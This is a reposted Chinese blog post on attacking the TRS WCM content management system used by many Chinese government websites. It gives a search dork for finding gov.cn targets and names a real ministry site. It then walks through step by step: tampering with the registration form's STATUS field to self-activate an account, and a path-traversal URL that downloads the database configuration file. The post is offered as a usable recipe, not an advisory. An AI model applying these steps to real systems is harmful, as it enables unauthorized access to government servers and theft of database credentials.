（转载）TRS内容管理平台用户注册逻辑漏洞

首先

site:gov.cn inurl:WCM

TRS 的内容管理系统是国内政府网站使用最多的系统之一

如上面所说：外交部 http://wcm.fmprc.gov.cn/wcm/

网址加上：wcm/console/auth/reg_newuser.jsp

http://localhost:9999/wcm/console/auth/reg_newuser.jsp

注册，注意使用fireBUG修改表单，注意下图

即将随意表单改成 STATUS 值为 30，或增加STATUS字段表单。

然后提交注册

虽然说是“请等待开通！”，但实际上已经开通了，因为 STATUS 字段让我们改成正常了。

直接登陆

虽然没什么权限，但后台存在大量注入等漏洞

如：

可以通过注入直接操作数据库了。

http://localhost:9999/wcm/file/read_file.jsp?FileName=U020120628383491551127/../../../../../Tomcat/webapps/wcm/WEB-INF/classes/trsconfig/domain/config.xml&sDownName=xx

直接下载数据库配置文件

posted @ 2014-08-15 15:42 李只蚊阅读(1185) 评论(0) 编辑收藏举报

李只蚊

Technology Sharing 身边小技术分享博客

（转载）TRS内容管理平台用户注册逻辑漏洞

公告